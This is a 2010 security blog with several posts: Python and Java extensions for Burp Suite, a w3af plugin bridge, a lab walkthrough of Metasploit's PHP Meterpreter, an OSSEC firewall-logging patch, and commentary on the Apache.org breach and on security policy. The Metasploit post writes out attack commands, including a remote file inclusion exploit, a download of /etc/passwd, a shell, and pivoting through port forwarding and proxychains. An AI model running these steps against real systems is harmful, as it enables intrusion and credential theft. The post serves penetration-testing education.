David Robert's -castlebbs- Blog


Thursday 9 September 2010

Running w3af plugins in Burp Suite

I am quite enthusiastic about the Burp Suite Python extension I wrote. It is a Python (Jython) binding, written in Java, that implements the Burp Suite extension API.

In the to-do list, I mentioned that more examples needed to be written to show the benefit of having Python support in Burp Suite for writing extensions.

w3af is a web application attack and audit framework written in Python with a plugin-based model. I found it interesting to see what's involved in enabling Burp Suite to use w3af plugins.

As a demo/proof-of-concept I created a BurpExtender.py Python extension to load and execute w3af plugins within Burp Suite.

Not all the w3af plugins can be used in Burp, mainly because of limitations in the BurpExtender API. So for the moment, only plugins from the grep and evasion categories are supported.

While I may look at implementing other categories of plugins, having access to the grep plugins is already nice: all the traffic going through Burp is passively scanned by the plugins, and weaknesses are reported in the Alert tab and in the console.
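To make the passive-scanning idea concrete, here is a minimal sketch in plain Python of how a grep-style plugin can be dispatched for each response. This is not the actual extension code: the PrivateIPGrep class and process_response function are illustrative stand-ins for a w3af grep plugin (such as grep.privateIP) and for the dispatch done in BurpExtender.processProxyMessage:

```python
import re

class PrivateIPGrep:
    """Illustrative stand-in for a w3af grep plugin such as grep.privateIP."""
    name = "privateIP"
    pattern = re.compile(
        r"\b(?:10\.\d{1,3}|192\.168|172\.(?:1[6-9]|2\d|3[01]))(?:\.\d{1,3}){2}\b")

    def grep(self, url, response_body):
        # Return one alert string per finding (an empty list means nothing found)
        return ["%s: private IP %s disclosed at %s" % (self.name, m, url)
                for m in self.pattern.findall(response_body)]

def process_response(plugins, url, response_body):
    """What processProxyMessage() conceptually does for each response."""
    alerts = []
    for plugin in plugins:
        alerts.extend(plugin.grep(url, response_body))
    return alerts  # in Burp these would go to issueAlert() and the console
```

In the real extension, each response passing through the proxy is handed to every loaded grep plugin in the same way.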

How to use it:
  1. Download the BurpSuite w3af plugin
  2. Follow the instructions for the installation of the Burp Suite Python extension
  3. Select which plugins you want to use - this is done in the first lines of BurpExtender.py:
# Here you define the name of the plugins you want (category.plugin)
plugins = ['grep.domXss',  'grep.error500', 'grep.errorPages', 'grep.feeds',  
           'grep.fileUpload','grep.hashFind', 'grep.httpAuthDetect', 'grep.privateIP', 'grep.ssn',
           'grep.strangeHeaders', 'grep.strangeHTTPCode', 'grep.strangeReason', 'grep.svnUsers', 'grep.wsdlGreper']

You need to specify the path of the w3af python modules. I have tested this program with w3af version 1.0-rc3.

# Here you should define the location of your w3af installation
w3afPath="C:\\local\\Program Files\\w3af\\w3af"
# Example for Unix "/usr/local/w3af/w3af"
  4. Start Burp (example below with Windows):
C:\Burp>java -Xmx512m -classpath burpsuite_v1.3.03.jar;burppython.jar burp.StartBurp
init: Bootstrapping class not in Py.BOOTSTRAP_TYPES[class=class org.python.core.PyStringMap]
BurpExtender.py needs to be in a folder listed below:
['C:\\Burp\\Lib', '/C:/Burp/burppython.jar/Lib', '__classpath__', '__pyclasspath__/']
loading w3af plugins
Loading grep.domXss...                     Success
Loading grep.error500...                   Success
Loading grep.errorPages...                 Success
Loading grep.feeds...                      Success
Loading grep.fileUpload...                 Success
Loading grep.hashFind...                   Success
Loading grep.httpAuthDetect...             Success
Loading grep.privateIP...                  Success
Loading grep.ssn...                        Success
Loading grep.strangeHeaders...             Success
Loading grep.strangeHTTPCode...            Success
Loading grep.strangeReason...              Success
Loading grep.svnUsers...                   Success
Loading grep.wsdlGreper...                 Success

Failed plugins are ignored and won't be processed. You can uncomment
the line 'print str(e)' in the module to see the actual exception
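The loading loop boils down to one try/import per plugin name. A simplified, hypothetical sketch of that loop (plain Python 3 with importlib rather than the Jython-specific code, and standard module names instead of w3af plugin names):

```python
import importlib

def load_plugins(names):
    """Import each plugin module by dotted name, ignoring the ones that fail."""
    loaded, failed = {}, []
    for name in names:
        try:
            loaded[name] = importlib.import_module(name)
            print("Loading %s... Success" % name)
        except Exception as e:
            # Failed plugins are ignored; uncomment to see the actual exception:
            # print(str(e))
            failed.append(name)
    return loaded, failed
```

With real w3af plugins, the names would be the category.plugin paths resolved relative to the w3af installation directory added to sys.path.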

While browsing, if issues are passively identified, they will appear in the console and in the alert tab:


  1. As stated previously, not all plugin categories are supported; I may look at the others in the future, so please email me if you have this need
  2. I probably need to put more work into the evasion plugin support, since there are some issues with the order in which the HTTP headers are sent back to Burp
  3. Some grep plugins won't work out of the box because they require the sqlite3 Python module, which is not available in the Java Python implementation used by the extension (Jython). However, it is possible to get this working using the sqlite JDBC support. Please drop me an email if you need help implementing this so you can have all plugins working.

Please give me some feedback if you try it: david@ombrepixel.com

Monday 30 August 2010

Extending Burp Suite in Python

In a previous post, I wrote about creating a Burp Suite extension in Java using the IBurpExtender interface. When performing web application security testing, I often need to write small pieces of code to help me automate some tasks, and the code is generally specific to the application I am testing. While I like Java, I think that dynamically typed languages are better suited for creating small pieces of code quickly. However, don't misquote me: dynamically typed languages like Python can also be (and are) used for very large development projects.

Having used Python for about 8 years now, I found the idea of creating a Python binding for Burp Suite very interesting. Since Burp is written in Java, I obviously used Jython, the Java implementation of Python.

My goal was to allow anyone to write Burp extensions directly in Python using the same BurpExtender interface. Therefore, if you have written Burp extensions in Java, you already know how to write them in Python.

First example

This very simple extension replaces the string "java" with "python" in all HTTP responses received by Burp. It is useless, but it shows how easy it is to write an extension in Python. Only these few lines of code are needed:

from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def processProxyMessage(self,messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            message = message.tostring().replace("java","python")
        return message

Embedding an interactive python interpreter

Let's look at something a bit more interesting: using an interactive Python console to work on messages processed by Burp:

from burp import IBurpExtender
from java.net import URL
from code import InteractiveConsole

class BurpExtender(IBurpExtender):
    def processProxyMessage(self,messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            uUrl = URL("HTTPS" if serviceIsHttps else "HTTP", remoteHost, remotePort, url)
            if self.mCallBacks.isInScope(uUrl):
                message = message.tostring()
                from pprint import pprint
                loc = locals()
                c = InteractiveConsole(locals=loc)
                c.interact("Interactive python interpreter")
                for key in loc:
                    if key != '__builtins__':
                        exec "%s = loc[%r]" % (key, key)
        return message

    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks

What this code does, basically, is launch a Python interpreter and make the whole Python namespace available: you can access and modify any field and method offered by the BurpExtender object. Is this not cool?

Only messages that are in the Burp Suite scope will be intercepted and made available interactively (Target/Scope tab in Burp). This is done by the line:

 if self.mCallBacks.isInScope(uUrl):

isInScope is a callback function; the mCallBacks object is registered by the registerExtenderCallbacks Python method.

Below is an example of what is available in the interactive shell. The shell runs on the console used to start Burp Suite and is launched whenever a message is in scope.

First, we are within the scope of the processProxyMessage method and have direct access to its parameters.

Interactive python interpreter
>>> pprint(dir())

>>> pprint(message)
'HTTP/1.1 200 OK\r\nDate: Mon, 30 Aug 2010 12:16:40 GMT\r\nServer: Apache/2.2.9 (Fedora)\r\nLast-Modified: Mon, 30 Aug 2010 11:12:52 GMT\r\nETag: "2aa3a-4d-48f088ba1f500"\r\nAccept-Ranges: bytes\r\nContent-Length: 77\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html>\n<head>\n<title>Test!</title>\n</head>\n<body>\nHello all!\n</body>\n</html>\n'

>>> print resourceType, responseContentType, statusCode
html text/html; charset=utf-8 200

It is also possible to interact with all the BurpExtender fields and methods:

>>> pprint(dir(self))

It is possible, for example, to call any Burp method provided by the callback object:

>>> for message in self.mCallBacks.getProxyHistory():
...     message.getRequest().tostring()
'GET /test.html HTTP/1.1\r\nHost:\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008121622 Fedora/3.0.5-1.fc9 Firefox/3.0.5\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nProxy-Connection: keep-alive\r\nCache-Control: max-age=0\r\n\r\n'

Adding new options in Burp Suite menus

This only works with the professional version of Burp Suite (minimum 1.3.07)

Now I am going to show how to create a new menu item within Burp that calls new functions written in Python. The code below adds a "Compare parameters" item to the Burp Suite contextual menu. In the Proxy/History tab, you can select two messages, right click and select the new compare function. This code is just an example of what can be done: it compares the GET and POST parameters between two requests and reports the differences. It can be useful, though, because the Burp Suite comparer is not great at comparing requests.

from burp import IBurpExtender
from burp import IMenuItemHandler

from cgi import parse_qs

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks
        self.mCallBacks.registerMenuItem("Compare parameters", ArgsDiffMenuItem())

class ArgsDiffMenuItem(IMenuItemHandler):
    def menuItemClicked(self, menuItemCaption, messageInfo):
        print "--- Diff on arguments ---"
        if len(messageInfo) == 2:
            # We can do a diff
            get1, post1 = HttpRequest(messageInfo[0].getRequest().tostring()).getParameters()
            get2, post2 = HttpRequest(messageInfo[1].getRequest().tostring()).getParameters()
            print "Diff in GET parameters:"
            self.diff(get1, get2)
            print "Diff in POST parameters:"
            self.diff(post1, post2)
        else:
            print "You need to select two messages to do an argument diff"
        print "\n\n"

    def diff(self, params1, params2):
        for param in params1:
            if param not in params2:
                print "Param %s=%s is not in the second request" % \
                      (param, params1[param])
            elif params1[param] != params2[param]:
                print "Request1 %s=%s Request2 %s=%s" % \
                      (param, params1[param], param, params2[param])
        for param in params2:
            if param not in params1:
                print "Param %s=%s is not in the first request" % \
                      (param, params2[param])

class HttpRequest:
    def __init__(self, request):
        self.request = request

    def getParameters(self):
        # get url parameters
        requestLine = self.request.split("\r\n")[0]
        url = requestLine.split(" ")[1]
        get = parse_qs(url.split("?", 1)[1]) if "?" in url else {}

        # get body parameters
        body = self.request.split("\r\n\r\n", 1)
        post = parse_qs(body[1]) if len(body) == 2 and body[1] else {}
        return get, post
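The same parsing and diff logic can be exercised outside Burp with plain Python 3 (urllib.parse.parse_qs stands in for the cgi.parse_qs used above; the two requests are made up for illustration):

```python
from urllib.parse import parse_qs, urlsplit

def request_params(request_text):
    """Split a raw HTTP request into (GET params, POST params) dicts."""
    head, _, body = request_text.partition("\r\n\r\n")
    request_line = head.split("\r\n")[0]        # e.g. "POST /a?x=1 HTTP/1.1"
    url = request_line.split(" ")[1]
    get = parse_qs(urlsplit(url).query)
    post = parse_qs(body)
    return get, post

def param_diff(params1, params2):
    """Return the differences, like ArgsDiffMenuItem.diff() prints them."""
    out = []
    for p in params1:
        if p not in params2:
            out.append("Param %s=%s is not in the second request" % (p, params1[p]))
        elif params1[p] != params2[p]:
            out.append("Request1 %s=%s Request2 %s=%s"
                       % (p, params1[p], p, params2[p]))
    for p in params2:
        if p not in params1:
            out.append("Param %s=%s is not in the first request" % (p, params2[p]))
    return out
```

Running param_diff on two captured requests shows at a glance which parameters were added, removed or changed between them.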
How to use the python extension

You need the burppython.jar extension. I have created a jar file that contains the Jython interpreter, so you don't need to install anything else.


  1. Download the zipfile attached at the end of this article.
  2. Unzip the content into a dedicated folder.
  3. Copy the Burp Suite jarfile into this folder (something like burpsuite_pro_v1.3.07.jar or burpsuite_v1.3.03.jar).
  4. Place the Python extension (BurpExtender.py) in the Lib subfolder.
  5. Launch Burp Suite using suite.bat or suite.sh.

Please send an email to david@ombrepixel.com if you have any questions

To be done

A lot needs to be done:

  1. Add the capability of using several Python and Java extensions at the same time and linking them together
  2. Add the capability of dynamically reloading a Python extension without having to stop and restart Burp
  3. Put the project on a version control system like GitHub
  4. Add more demos that leverage the numerous Python libraries that already exist. UPDATE: please see the w3af extension
  5. ..

Friday 6 August 2010

Porting WebScarab functions to Burp Proxy

I think that the "Reveal hidden fields in HTML pages" option from WebScarab is better than the equivalent "unhide hidden form fields" option in Burp Proxy. Therefore, I ported the WebScarab code in charge of this to Burp Suite as a BurpExtender extension.

Sometimes it can save time to unhide hidden fields so you can see and modify them when testing a web application. Both Burp Proxy and WebScarab offer this option. However, it seems that "unhide hidden form fields" in Burp only reveals the field values and not the field names.

With the native "unhide hidden form fields" option in Burp Proxy, the revealed fields look like this:


With the Burp Proxy extension I wrote (using WebScarab code), the names of the fields are displayed before the values:


This code was tested with Burp Suite professional 1.3.07 and the free version 1.3.03.

import java.net.URL;
import java.util.*;
import java.util.regex.*;
import java.io.*;

public class BurpExtender {
    public burp.IBurpExtenderCallbacks mCallbacks;

    public byte[] processProxyMessage(int messageReference, boolean messageIsRequest,
                  String remoteHost, int remotePort, boolean serviceIsHttps, String httpMethod,
                  String url, String resourceType, String statusCode, String responseContentType,
                  byte[] message, int[] interceptAction) {
        if (!messageIsRequest) {
            try {
                URL uUrl = new URL(serviceIsHttps ? "HTTPS" : "HTTP", remoteHost, remotePort, url);
                // We are only looking at urls in scope with Burp (Target tab) and also only text
                // based content-types. In some cases responseContentType is null; I found this is
                // the case when Content-Length is 0, identified using mCallbacks.getHeaders()
                if (mCallbacks.isInScope(uUrl) && responseContentType != null
                     && responseContentType.contains("text"))
                    return revealHidden(message);
            } catch (Exception e) {}
        }
        return message;
    }

    public void registerExtenderCallbacks(burp.IBurpExtenderCallbacks callbacks) {
        mCallbacks = callbacks;
    }

    // Code from WebScarab (slightly modified)
    private byte[] revealHidden(byte[] content) {
        /* We split this pattern into two parts, one before "hidden" and one after.
         * Then it is simple to concatenate part 1 + "text" + part 2 to get an
         * "unhidden" input tag */
        Pattern inputPattern = Pattern.compile("(<input.+?type\\s*=\\s*[\"']{0,1})hidden([\"']{0,1}.+?>)", Pattern.CASE_INSENSITIVE);
        Matcher inputMatcher = inputPattern.matcher(new String(content));
        StringBuffer outbuf = new StringBuffer();
        boolean matchedOnce = false;
        /* matched hidden input parameter */
        while (inputMatcher.find()) {
            matchedOnce = true;
            String input = inputMatcher.group();
            String name = "noname";

            // extract hidden field name
            Pattern namePattern = Pattern.compile("name=[\"']{0,1}(\\w+)[\"']{0,1}", Pattern.CASE_INSENSITIVE);
            Matcher nameMatcher = namePattern.matcher(input);
            if (nameMatcher.find() && nameMatcher.groupCount() == 1) {
                name = nameMatcher.group(1);
            }

            // make hidden field a text field - there MUST be 2 groups
            // Note: this way we don't have to care about which quotes are being used
            input = inputMatcher.group(1) + "text" + inputMatcher.group(2);

            /* insert [hidden] <fieldname> before the field itself */
            inputMatcher.appendReplacement(outbuf, "<STRONG style=\"background-color: white;\"> [hidden field name =\"" + name + "\"]:</STRONG> " + input + "<BR/>");
        }
        inputMatcher.appendTail(outbuf);
        return matchedOnce ? outbuf.toString().getBytes() : content;
    }
} // end BurpExtender

You can download the extension as a jar file (attachment below). To use it, you need to launch Burp this way:

java -classpath burpreveal.jar:burpsuite_v1.3.03.jar burp.StartBurp

On Windows based platforms, use a semi-colon character instead of the colon as the classpath separator.

Only the websites that are defined in the proxy scope (Target->Scope) will have their fields revealed.
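For readers more comfortable with Python, the core of revealHidden() can be sketched in a few lines. This is a simplified transcription, not a drop-in replacement: the regexes are loosened from the Java version above, and the function works on strings rather than byte arrays:

```python
import re

# An <input ... type="hidden" ...> tag, split around "hidden" so that
# group(1) + "text" + group(2) rebuilds the tag as a text field.
INPUT = re.compile(r"(<input[^>]+?type\s*=\s*[\"']?)hidden([\"']?[^>]*>)", re.I)
NAME = re.compile(r"name=[\"']?(\w+)[\"']?", re.I)

def reveal_hidden(html):
    """Turn type=hidden inputs into text fields, labelled with their name."""
    def unhide(m):
        name_m = NAME.search(m.group())
        name = name_m.group(1) if name_m else "noname"
        unhidden = m.group(1) + "text" + m.group(2)
        return ('<STRONG style="background-color: white;"> [hidden field name ="%s"]:'
                '</STRONG> %s<BR/>' % (name, unhidden))
    return INPUT.sub(unhide, html)
```

Pages without hidden inputs pass through unchanged, just as in the Java extension.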

Tuesday 27 July 2010

Metasploit 3.4.1: PHP Meterpreter

Only two months after version 3.4.0 of the framework, version 3.4.1 has been released with a significant number of new features.

Among the new features, I found this one really interesting:

  • PHP Meterpreter - A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system

The Meterpreter is an advanced post-exploitation system and one of the best features of Metasploit. If you don't know what it is, I recommend you have a look at it first.

Below is an example on how to launch a meterpreter session exploiting a Remote File Inclusion vulnerability in a php application. For the purpose of this test, I used the vulnerable version of Autonomous LAN party:

  • My "metasploit server" is on
  • The "vulnerable linux server" hosting the vulnerable web application is on, it is also connected to another subnet: not accessible by the Metasploit server
  • There is a windows "server" on the other subnet:
               _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9925 updated yesterday (2010.07.25)

msf > use unix/webapp/php_include
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set SRVHOST
msf exploit(php_include) > set PHPURI /alp/include/_bot.php?master[currentskin]=XXpathXX
PHPURI => /alp/include/_bot.php?master[currentskin]=XXpathXX
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp

We use the unix/webapp/php_include generic exploit with the php/meterpreter/bind_tcp payload, and then run it:

msf exploit(php_include) > exploit
[*] Started bind handler

[*] Using URL:
[*] PHP include server started.
[*] Sending stage (35521 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-07-27 00:12:04 +0100

meterpreter >

We now have a Meterpreter session. Here are examples of commands that are supported by the PHP Meterpreter:

meterpreter > sysinfo
Computer: castlebbs-vulnerable
OS      : Linux castlebbs-vulnerable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
meterpreter > cat /etc/hosts
       localhost
       castlebbs-vulnerables.localdomain       castlebbs-vulnerable
  windows-server.localdomain  windows-server
meterpreter > download /etc/passwd /tmp/pass
[*] downloading: /etc/passwd -> /tmp/pass
[*] downloaded : /etc/passwd -> /tmp/pass//etc/passwd

We can obtain a shell:

meterpreter > execute -i -f /bin/bash
Process 5487 created.
Channel 5 created.
  PID TTY          TIME CMD
 5485 ?        00:00:00 apache2
 5486 ?        00:00:01 apache2
 6175 ?        00:00:00 sh
 6176 ?        00:00:00 bash
 6177 ?        00:00:00 ps

The Meterpreter for Windows systems includes many more functions that don't make sense in the context of a PHP exploitation (eg. DLL injection, migration etc.). But the really good thing with the PHP Meterpreter is that it has fully functional support for port forwarding and also enables the creation of new routes. For instance, having exploited an RFI on our web application, we can pivot through the webserver and pen-test the Windows server on the other subnet, still from our Metasploit server.

First, let's have a look at the capability of adding a new route:

msf exploit(php_include) > sessions -l

Active sessions

  Id  Type         Information                           Connection
  --  ----         -----------                           ----------
  1   meterpreter  www-data (33) @ castlebbs-vulnerable ->

msf exploit(php_include) > route add 1
msf exploit(php_include) > route print

Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------      Session 1

It needs to be understood at this stage that this route is added not to the operating system's routing table but to the framework itself. It means that most auxiliary modules and exploits will work directly, with the network traffic routed through the Meterpreter. Below is an example of using scanner/smb/smb_version on the routed host:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > run

[*] is running Windows XP Service Pack 2 (language: French) (name:CASTLEBBS) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now let's look at the port-forwarding capability. While the routing capability of Metasploit is nice, as said previously it is not a route defined at the operating-system level on the Metasploit server, which means that no software except Metasploit can reach the routed host directly. The command below forwards the local port 222 (on the Metasploit server) to the remote port 22 of the vulnerable Linux server.

meterpreter > portfwd add -L -l 222 -r -p 22
[*] Local TCP relay created: <->

Because we didn't upload a custom SSH server, we need to know the credentials to log in (or let's say scanner/ssh/ssh_login was successful). Launching this command:

ssh -p 222 localhost -l user

will actually open an SSH session on the vulnerable Linux server: this is the port forwarding. Better still, we can use the SSH port-forwarding options to access the ports of the Windows server directly. In the example below, the local port 445 is forwarded to port 445 on the Windows server, so SMB tools can be launched locally.

ssh -L 445: -p 222 user@localhost

And as the icing on the cake, we can use the SSH dynamic port option (-D, please see man ssh) with proxychains on the Metasploit host, so all traffic is redirected through the vulnerable Linux server acting as a SOCKS proxy, enabling full access to the subnet(s) it is connected to.

Proxychains configuration (default):
socks4 9050

# ssh -D 9050  -p 222 user@localhost
# proxychains nmap -sV
# proxychains msfconsole # haha this even worked - but maybe not very useful since metasploit has the route option

Thursday 13 May 2010

OSSEC active response with linux: logging dropped packets

OSSEC is a great piece of software. When you understand how it works well, you can consider using active responses so that it really acts like a Host-based Intrusion Prevention System.

There are a number of risks in enabling active responses, more details on the active-responses page:

  • Being used by attackers as a denial-of-service attack (triggering a response for a large number of legitimate IPs, for instance using IP spoofing).
  • False positives: the configuration needs to be finely tuned regarding what level and/or which rules will trigger an active response.

But when the risks are understood, it can be a great active defense tool, for example blocking brute-force attacks in real time.

Custom active responses can be written. OSSEC comes with a set of active-response scripts for Linux; one of them is firewall-drop.sh, which adds new rules to the Linux firewall (iptables) to drop the attacker's packets.

This entry describes how to enable logging of dropped packets. I find it useful to know whether the response is effective: what packets are being blocked after the response is triggered, how long the attack continues, etc. This information is useful for tuning the active-response timeout.

If, like me, you want to have logging enabled: since there is no option for that, I propose a patch for firewall-drop.sh.
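The patch itself is not reproduced here; the idea, assuming the stock firewall-drop.sh shipped with OSSEC 2.4.1, is simply to pair every iptables DROP rule with a LOG rule, so each dropped packet leaves a trace in syslog before being dropped. A hedged sketch of the shell change (chain name and log prefix are illustrative):

```
# On the "add" action, insert a LOG rule above the DROP rule; LOG is a
# non-terminating target, so matching packets are logged, then dropped:
iptables -I INPUT -s ${IP} -j DROP
iptables -I INPUT -s ${IP} -j LOG --log-prefix "ossec-drop: "

# On the "delete" action, remove both rules:
iptables -D INPUT -s ${IP} -j LOG --log-prefix "ossec-drop: "
iptables -D INPUT -s ${IP} -j DROP
```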

As shown on the Splunk chart above, it is possible to check that the active-response timeouts are correct for the majority of attack scenarios. At the bottom, in yellow, are the active responses: the first bar is when OSSEC started to block the IP, and the second one is when OSSEC removed the firewall rules, hence unblocking the IP. At the top, in blue, are the packets from the attacker being dropped after the active response was enabled.

This patch works with OSSEC version 2.4.1

Wednesday 21 April 2010

McAfee DAT 5958 deletes svchost.exe

http://www.incidents.org/diary.html?storyid=8656 Signature update 5958 locks out Windows XP SP3 clients by deleting or quarantining the file svchost.exe.

It is definitely not the first time an antivirus deletes a critical file of an operating system (eg. AVG removing user32.dll, the Symantec update that affected millions of PCs, or the BitDefender update that caused 64-bit Windows machines to stop working).

Looking at the posts on various mailing-lists, it appears that some people now need to manually fix up to thousands of PCs, depending on the size of their network.

It's time, if it's not already done, to review your antivirus procedures to include testing and deployment strategies, so that signature updates are not deployed on all PCs at the same time. As well as documenting the process to follow when a new virus is not detected, you also need to document what to do when you have a false positive. And keep your antivirus vendor's support contact numbers up to date in case you need them!

If it's too late: http://vil.nai.com/vil/5958_false.htm

Saturday 17 April 2010

Apache.org incident: started with a XSS flaw

Apache.org suffered a targeted attack between the 5th and the 9th of April. The Apache infrastructure team wrote a comprehensive incident report that is worth reading.

I find this report interesting because it is well written, and because it is a good example of a successful attack that is not too difficult to understand from a technical point of view. It illustrates well that a successful attack is most of the time the result of successive exploitations of different vulnerabilities.


The exploitation of a single vulnerability is often not enough to compromise a system (though this can happen). Most of the time, it is the presence of several vulnerabilities and the smart exploitation of a combination of them that enables attackers to achieve their goals.

It's important to bear this in mind when assessing the security of a system. If you use risk classification for vulnerabilities and only look at them individually, you may underestimate the risk.

Reflected XSS risk?

This attack led to the compromise of two servers used by the foundation (shell access, one server with root privileges); numerous passwords were stolen, a web application was modified to steal even more passwords, etc. None of this would have been possible without the exploitation of the first weakness: a non-persistent (or reflected) XSS.

This type of cross-site scripting issue is very common in web applications. Because this type of XSS is non-persistent, I unfortunately still often see security reports rating it a Minor risk. Obviously, a non-persistent XSS won't give you a remote root account, but as you can see in the Apache compromise, it was the first step. Without this first step, the Apache compromise wouldn't have been possible (at least via this scenario).
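To see why the risk is routinely underrated, recall what a reflected XSS attack looks like: everything needed to steal a session rides in a single crafted link. A purely illustrative example (hypothetical hostnames and parameter, not taken from the Apache report):

```
https://issues.example.org/search?q=<script>document.location='http://attacker.example/c?'+document.cookie</script>
```

One click by a logged-in administrator and the session cookie is delivered to the attacker, much like the first step described in the Apache incident.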

Ironically, I understand that XSS is stepping down from rank 1 to rank 2 in the new 2010 OWASP Top Ten because, from now on, the team will focus more on risks than on probability. This is my understanding from listening to this podcast. (The 2010 OWASP Top Ten was not published yet at the time I wrote this article.)

What can we learn from this incident?

In the report, the team explains what the issues were and how they fixed them (sections "What worked?", "What didn't work?", "What are we changing?").

As said at the beginning of this article, this attack was not particularly sophisticated. Using XSS to steal a session cookie is a textbook case, brute-force attacks are obviously not new, improper file/folder permissions on a webserver are more than common, and the issues related to password storage are basic as well.

Although some of the vulnerabilities on the hacked servers/applications could have been fixed before, humans make mistakes and this is not going to change. A more important issue, in my opinion, is that the attack went undetected for a few days. With current technology, the Apache team could have been alerted in real time for at least:

  • Brute-force attacks (hundreds of thousands of password attempts cannot go undetected)
  • Changes to an application's administration settings (changing the path used to upload attachments)
  • Changes to an application (new JSP files, a JAR file that would collect all passwords on login and save them)

It's a common mistake to focus only on preventive controls. In the report I can't read much about plans for detective controls. Even in the sections "What didn't work?" and "What are we changing?" there is no mention of being alerted that something is going wrong.

Today, it is important to have pro-active monitoring of what is happening on our servers. Logs should be monitored and alerts raised based on criteria and thresholds; operating-system and application configuration and program files should be monitored using integrity-checking tools, etc. Procedures should be in place to monitor and react to these events. At the end of the day it's people who will take action, so their involvement in the monitoring process should not be overlooked.

Regarding monitoring technology, many products are available; on the open-source side, I would definitely recommend having a look at OSSEC, a Host-based Intrusion Detection System (HIDS).

Also, it is important to mention that this kind of attack is very common, and it's not possible to rely on network infrastructure security to prevent it: firewalls, network Intrusion Prevention Systems, etc. are likely to let the attackers in. There were no buffer overflows and no unauthorized network ports used in this attack, for instance.

Other considerations

  • TinyURL and other URL-shortening websites are now used to deceive you into clicking on a link and becoming the victim of cross-site scripting attacks. You should be careful clicking on these links, and I would recommend using the Preview feature.

  • In this attack, once an administrator session was hijacked by exploiting the XSS vulnerability, the next steps were possible because of a badly configured web application: it was possible to copy JSP files to a folder that would execute them. This is an issue I see very often: the operating-system user that runs the web server should not have the right to write to a folder that executes dynamic web pages.

Friday 12 February 2010

The three most important security policies

What are the top 3 most important information security policies a company can have?

This question was asked on LinkedIn, and I found it very interesting to read the different opinions given. Based on the answers, I think it is possible to guess differences in how people approach security policies. For example, reading the answers, you can figure out whether the person is technology- or process-minded.

My answer reflects my opinion regarding Information Security. I think that technology is obviously essential to protect information systems. However:

  • without a strong governance structure...
  • ...driving a security program...
  • ...supported by a consistent set of security policies...

... technology can be a waste of money. The cursor should be placed somewhere between technology and governance. If it is positioned too near technology, you will experience issues like these:

  • No authority to enforce a security requirement (e.g. you need to install a great security product on the servers of a new project, but the project manager doesn't want it installed, and he has the final word because the new application needs to go live as soon as possible).
  • No consistency in the application of security across information assets (e.g. who cares about the security of the old mainframe when you would rather work on the security of your new virtual infrastructure!).
  • No strategy or alignment with the business's current and future objectives/initiatives (e.g. you keep working on preventing the blue screen of death with the latest Microsoft security patches while your company plans to acquire a competitor, connects both networks directly, and nobody thinks security should be involved).
  • You have many firewalls, intrusion detection systems, proxies and anti-virus products, but programmers have no secure programming standards and web application programmers have never heard of OWASP.
  • You have many firewalls, intrusion detection systems, proxies and anti-virus products, but you are still unsure whether you would notice an attack, because you don't have time to review the logs and you are not too sure the alerts work.
  • ...
Well, actually I could make a very, very long list. It could be fun, though: I may contact MITRE to propose a new enumeration, the Technology-Focused Security Drawback Enumeration (TFSDE) :-)

Well, as you have probably understood from reading these few lines, I am more than convinced that security policies are essential. Policies establish, but also demonstrate, governance. I am convinced of the essential need for security policies, but for the right reasons, not just to tick a box and have the number of findings go down when the auditor comes back. Unfortunately, that is still the main driver for policies and information security in general.

My Answer to the question:

What are the top 3 most important information security policies a company can have?

This is actually a very good question: every security professional has to review policies and prioritize their work, so it makes sense to work out where to start.

I like the work done by Thomas R. Peltier in categorizing policies into three tiers:

  • Global policies (Tier 1)
  • Topic-specific policies (Tier 2)
  • Application-specific policies (Tier 3)

The CISSP body of knowledge also describes three classifications of policies that more or less match Peltier's:
  • Organizational or Program policy
  • Functional, issue specific policies
  • System specific policies

As I have never seen two companies with the same set of policies (even if, in one way or another, they address the same things), I find it useful to first identify which category each belongs to.

If you see the set of policies as a pyramid, the policy at the top is the most important and the one that needs to be reviewed first. This is the one in Tier 1 (Peltier's classification) or the Organizational policy (CISSP classification).

Let's call it the "Organizational Information Security Policy", at the top of the pyramid. This policy normally lays out fundamental things like:
  • The governance structure for security
  • Senior management commitment
  • The strategic and tactical security program
  • Roles and responsibilities

I like this policy to be easy to read, as a reference document for all employees, and I like to keep it short (4-5 pages max). I would definitely review this document first.

The next one I would look at is the Asset Classification policy. It needs to be crystal clear to the company which assets need to be protected, to what extent, and who owns them.

For the third one, if you are responsible for business continuity, I would say the Business Continuity Management policy. If that is out of your scope, my third would be the Acceptable Use policy.

